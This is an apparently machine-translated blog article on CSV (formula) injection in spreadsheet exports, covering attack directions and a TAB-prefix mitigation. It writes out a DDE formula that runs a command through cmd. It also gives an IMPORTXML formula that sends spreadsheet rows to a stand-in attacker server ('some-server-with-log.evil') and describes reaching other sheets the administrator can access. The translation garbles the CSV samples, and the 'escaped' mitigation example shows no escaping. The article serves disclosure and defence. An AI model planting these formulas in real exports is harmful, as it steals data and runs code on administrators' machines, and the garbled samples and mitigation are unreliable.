• Absurdly and amazement of CSV Injection
  • Originally written by georgemauer
  • The Nuggets translation Project
  • Permanent link to this article: github.com/xitu/gold-m…
  • Translator: mnikn
  • Proofreader: YCT21, CACppuccino

CSV injection: The big risk of being underestimated

I recently discovered this problem while tracking recent electricity bills from local customers and was asked to write it down.

This is old news in some ways, but in other ways. Well, I think very few people realize how devastating this problem is and how much damage it can cause. Applications that take user input and allow administrators to export the information in bulk to CSV files have an effective attack line.

This works for every application.

Revision: To their credit, these articles address the problem. A 2014 article by a security expert discusses some of the attack directions. Another one.

Now let’s get down to business — imagine we have an application that keeps track of time or receipts. Users can enter their own time (or ticket) into the app, but they can’t see other users’ information. The webmaster then exports the input to a CSV file and opens it with a spreadsheet application. It looks normal.

Attack Direction 1

We all know what a CSV file is. The features are simple, and the exported CSV file looks something like this

UserId, BillToDate ProjectName, Description, DurationMinutes, 1201-07-25, Test Project and Flipped the jibbet, 60 The 2201-07-25, Important Client."Bop, dop, and giglip", 240,Copy the code

Simple enough. There’s nothing dangerous in there. Even the RFC describes it this way:

The text contained in the CSV file should not be at any risk.

Even by definition, it should be safe.

Wait, let’s try changing the CSV file to the following

UserId, BillToDate ProjectName, Description, DurationMinutes, 1201-07-25, Test Project and Flipped the jibbet, 60 The 2201-07-25, Important Client."Bop, dop, and giglip", 25, 240, 2201-07 - Important Client,"2 + 5 =", 240,Copy the code

Evaluate expressions in Excel
Calculate the formula in Google Sheets

Open from Excel (left) and Google Sheets (right).

Well. It’s weird. Although the contents of the cell are in quotes, because the first character is =, it is processed as an expression. In fact — at least in Excel — symbols such as =, -, +, and @ trigger this behavior, resulting in the administrator discovering that the data is incorrectly formatted and spending a lot of time trying to figure out why (this Excel phenomenon caught my attention). It’s strange, but it’s not very dangerous, is it?

Wait, an expression is code that can be executed. So the user can execute code — albeit only expression code — on the administrator’s machine, which has access to user data.

What happens if we change the CSV file to this? (Note the Description column in the last line.)

UserId, BillToDate ProjectName, Description, DurationMinutes, 1201-07-25, Test Project and Flipped the jibbet, 60 The 2201-07-25, Important Client."Bop, dop, and giglip", 25, 240, 2201-07 - Important Client,"=2+5+cmd|' /C calc'! A0", 240,Copy the code

What happens if we open it in Excel?

The calculator will open!

Oh, my God!

Yes, the system’s calculator is on.

To be fair, there was a warning beforehand. It’s just that the warning is a big block of text, and no one wants to read it. Even if someone wants to read it, it explicitly advises:

Click OK only if you trust the workbook’s data

Do you want to know why that is? This is an application export file for administrators. Of course they trust the data!

What if their technology is good? So much worse. They know that THE CSV format is only text data and therefore cannot do any harm. They are quite sure of it.

As such, an attacker would have unlimited power to download keylogs, install things, execute code completely remotely on someone else’s computer, and possibly access to all users’ data if the computer belonged to a manager or an administrator of a company. I wonder if there are any other files on this computer that can be stolen?

Attack Direction 2

Okay, that’s pretty brief, but it’s a (relatively) famous bug. As a security expert, you’ve probably warned all administrators to be cautious about using Excel, or you might consider using Google Sheets instead. After all, Sheets won’t be affected by macros, right?

That’s absolutely true. So we retracted our ambition to “run anything” and focused on just stealing data. After all, the premise here is that the attacker is an ordinary user who can only access the data he has entered into the system. And an administrator has the power to see every user’s data. Is there any way we can take advantage of that?

Come to think of it, we can’t run macros in Google Sheets, but we can run expressions. And expressions are not limited to simple arithmetic. Actually, I was wondering if there is a Google Sheets command available in the formula that allows us to transfer data to other places? The answer is yes, there are many ways to do this. Let’s focus first on one of these methods, IMPORTXML.

IMPORTXML(url, xpath_query)

When running this command, it makes an HTTP GET request to the above URL, and then attempts to parse and insert the returned data into our spreadsheet. Do you have an idea?

If our CSV file has the following content:

UserId, BillToDate ProjectName, Description, DurationMinutes, 1201-07-25, Test Project and Flipped the jibbet, 60 The 2201-07-25, Important Client."Bop, dop, and giglip", 25, 240, 2201-07 - Important Client,"=IMPORTXML(CONCAT(""http://some-server-with-log.evil? v="", CONCATENATE(A2:E2)), ""//a"")", 240,Copy the code

The attacker starts the cell with the symbol = and points the address of IMPORTXML to an attacker’s server, attaching the spreadsheet data to that address as a query string. Now attackers can open their server logs and yoooooo. Finally got data that didn’t belong to them. Try it yourself on Requestb.in.

Are there any traces left? There were no warnings, no pop-ups, no reason to think there was anything wrong. The attacker simply enters a formatted time/question/other data entry, and eventually when the administrator wants to see the exported CSV file, all the restricted data is instantly and quietly transmitted.

Wait a minute. We can do worse than that.

The presentation runs on the administrator’s browser, which contains the administrator’s user account and security information. And Google Sheets doesn’t just manipulate data from the current spreadsheet; it can actually pull data from other spreadsheets, as long as the user has touched them. The attacker only needs to know the ids of the other tables. The information is usually not secret, it appears in the url of a spreadsheet, it is often accidentally found in an email, or it is posted on internal company documents, with Google’s security policies ensuring that only authorized users have access to the data.

So it’s not just your exported results/questions/other data that can slip out. Does your administrator have access to spreadsheets with customer lists or payroll information? Then maybe that information can get out too! Nothing is said. No one will ever know this happened. A racing boat!

Of course, the same trick works perfectly on Excel. In fact, Excel is the poster child for this and it’s been used by the police to track criminals.

But it doesn’t have to work that way.

I showed this information to a number of security researchers, who pointed out various pranks perpetrated by the perpetrators. Criminals, for example, embed messages in their respective communications that are beacons to their servers. That way, if researchers were secretly looking at their communications on a spreadsheet, the beacon would go out, allowing the perpetrators to effectively evade anyone who wanted to eavesdrop on them.

This is far from ideal.

The prevention of

So whose fault is all this?

It’s not the CSV format’s fault, of course. The format itself does not automatically implement something “like a formula,” which is not a native usage. This bug relies on commonly used spreadsheet programs that actually do something wrong. Of course, Google Sheets must match Excel’s capabilities, and Excel must support the millions of complex spreadsheets that already exist. Plus — AND I won’t go into this — there’s good reason to believe that Excel’s behavior comes from the strange processing of ancient Lotus 1-2-3. Getting all spreadsheet programs to change this behavior is currently a challenge. I think we should turn our attention to changing everyone.

I reported to Google that their spreadsheet program had a bug. They admit it, but claim to be aware of the problem. While I’m sure they understood that this was a bug, they gave me the distinct impression that they hadn’t really thought through the potential for abuse in practice. At the very least, Google Sheets should issue a warning when the CSV import is about to generate external requests.

But putting the blame on the app developer isn’t practical either. After all, most developers have no reason to suspect this problem after writing an export feature in a simple business application. In fact, even if they read the damn RFC, they still wouldn’t have any clues to the problem.

So how do you prevent this?

Well, while StackOverflow and other sites offer a wealth of advice, I’ve found that there’s only one (non-documented) method that can be used on any spreadsheet program:

For any cell that begins with the expression trigger character =, -, +, or @, you should prefix it directly with the TAB character. Note that if the contents of the cell are in quotes, the character is in quotes.

UserId, BillToDate ProjectName, Description, DurationMinutes, 1201-07-25, Test Project and Flipped the jibbet, 60 The 2201-07-25, Important Client."Bop, dop, and giglip", 25, 240, 2201-07 - Important Client,"2 + 5 =", 240,Copy the code

It’s weird, but it works, and TAB characters don’t show up in Excel and Google Sheets. So this is what I want?

Unfortunately, the story doesn’t end there. This character is not displayed, but it still exists. A quick test of the string length with =LEN(D4) confirms this fact. Therefore, this is an acceptable solution provided that the values of the cells are used only for display and not by the program. Further, the interesting thing is that this character creates strange inconsistencies. The CSV format is used to communicate information between applications. This means that escaped cell data exported from one application will be imported by another application as part of the data.

We ended up with the unfortunate conclusion that when generating a CSV export, you have to know what the export is for.

  • If you want to see the data when you evaluate it in a spreadsheet program, use TAB to escape it. This is actually more important, because you don’t want the result to be “1” when the string is “-2 + 3” when exported to a spreadsheet, which feels like the result of parsing in a programming language.
  • If it is used to communicate data between systems, then do not escape anything.
  • If you don’t know what will happen, or is to be used in the application in electronic form, or followed the spreadsheet software will be used as a source of import, give it up, can only pray not what’s happening (or, always disconnect the network connection, when using Excel and follow all safety tips) at work (revision: This is not 100% safe, as an attacker can still use macros to overwrite known files with their own binaries. Screw it.) .

It’s a nightmare scenario where people can use this loophole to do evil things and lose money because of it, and there’s no clear solution. This bug should be made known to more and more people.


The Nuggets Translation Project is a community that translates quality Internet technical articles from English sharing articles on nuggets. The content covers Android, iOS, React, front-end, back-end, product, design and other fields. If you want to see more high-quality translation, please continue to pay attention to the Project, official Weibo, Zhihu column.